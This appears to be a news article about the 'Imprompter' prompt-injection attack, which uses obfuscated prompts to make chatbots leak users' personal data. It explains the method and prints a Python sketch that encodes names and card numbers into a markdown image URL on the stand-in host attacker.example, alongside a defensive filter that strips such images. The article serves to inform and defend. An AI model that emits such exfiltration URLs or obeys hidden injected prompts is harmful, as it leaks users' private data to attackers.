New AI Attack 'Imprompter' Covertly Extracts Personal Data from Chatbot Conversations

Security researchers have developed a new attack method called 'Imprompter' that can secretly instruct AI chatbots to gather and transmit users' personal information to attackers, raising concerns about the security of AI systems.

Researchers Uncover New AI Vulnerability: 'Imprompter' Attack

Security researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore have unveiled a new attack method targeting AI chatbots, raising significant concerns about the security of personal information shared during conversations with large language models (LLMs) 1.

How Imprompter Works

The attack, dubbed 'Imprompter,' uses an algorithm to transform a malicious prompt into a seemingly random string of characters that looks like gibberish to a human reader but retains its meaning for the model. This obfuscated prompt instructs the LLM to:

  1. Extract personal information from user inputs
  2. Attach the data to a URL
  3. Quietly send it to the attacker's domain

All of this occurs without alerting the user, effectively hiding the attack "in plain sight" 1.
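The exfiltration step described above can be illustrated with a minimal sketch. Assuming the model is coaxed into emitting a markdown image whose URL encodes the extracted data, a chat client that renders the image will silently issue a request to the attacker's server, leaking the data in the query string. The domain, path, and field names below are hypothetical, not taken from the researchers' actual payload.

```python
from urllib.parse import urlencode

def build_exfil_markdown(extracted: dict, attacker_domain: str = "attacker.example") -> str:
    """Hypothetical illustration of URL-based exfiltration: PII fields are
    URL-encoded into the query string of a markdown image. If the chat UI
    renders the image, the browser fetches the URL and leaks the data."""
    query = urlencode(extracted)
    return f"![](https://{attacker_domain}/i.png?{query})"

# Example: the 'extracted' dict stands in for data the model pulled
# from the conversation; no request is actually made here.
payload = build_exfil_markdown({"name": "Alice Smith", "card": "4111111111111111"})
```

Because the markdown renders as an (invisible or broken) image rather than visible text, the user sees nothing unusual in the reply.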

Successful Tests on Major LLMs

The researchers tested Imprompter on two prominent LLMs:

  1. Le Chat by Mistral AI (France)
  2. ChatGLM (China)

In both cases, they achieved a nearly 80% success rate in extracting personal information from test conversations 2.

Types of Data at Risk

The attack can potentially extract a wide range of personal information, including:

  • Names
  • ID numbers
  • Payment card details
  • Email addresses
  • Mailing addresses

The breadth of this data collection makes Imprompter a significant threat to user privacy 3.

Broader Implications for AI Security

Imprompter is part of a growing trend of security vulnerabilities in AI systems. Since the release of ChatGPT in late 2022, researchers and hackers have consistently found security holes, primarily falling into two categories:

  1. Jailbreaks: Tricking AI systems into ignoring built-in safety rules
  2. Prompt injections: Feeding LLMs external instructions to manipulate their behavior

As AI becomes more integrated into everyday tasks, the potential impact of such attacks grows. Dan McInerney from Protect AI warns, "Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity" 2.

Industry Response and Mitigation

Mistral AI has reportedly fixed the vulnerability by disabling a specific chat functionality, as confirmed by the researchers. ChatGLM acknowledged the importance of security but did not directly comment on the vulnerability 1.
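The article does not detail Mistral's fix, but one generic defense against URL-based exfiltration is to filter the model's output before rendering, stripping markdown images that point to untrusted hosts. The sketch below shows this idea under stated assumptions; the allowlisted host and the `[image removed]` placeholder are made up for illustration and do not describe any vendor's actual implementation.

```python
import re

# Hypothetical allowlist: only images hosted on trusted domains are rendered.
ALLOWED_HOSTS = {"cdn.example.com"}

# Matches markdown images: ![alt](http://host/path), capturing the host.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\((https?://([^/\)]+)[^\)]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace markdown images with untrusted hosts by a placeholder,
    so an injected image URL cannot leak data via its query string."""
    def repl(match: re.Match) -> str:
        host = match.group(2)
        return match.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return IMAGE_PATTERN.sub(repl, markdown)
```

Disabling or sandboxing rich rendering entirely, as Mistral reportedly did with the affected chat functionality, is the blunter but more robust version of the same idea.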

User Precautions

In light of this discovery, users are advised to exercise caution when sharing personal information in AI chats. The convenience of AI assistance must be weighed against the potential risks to personal data security 3.
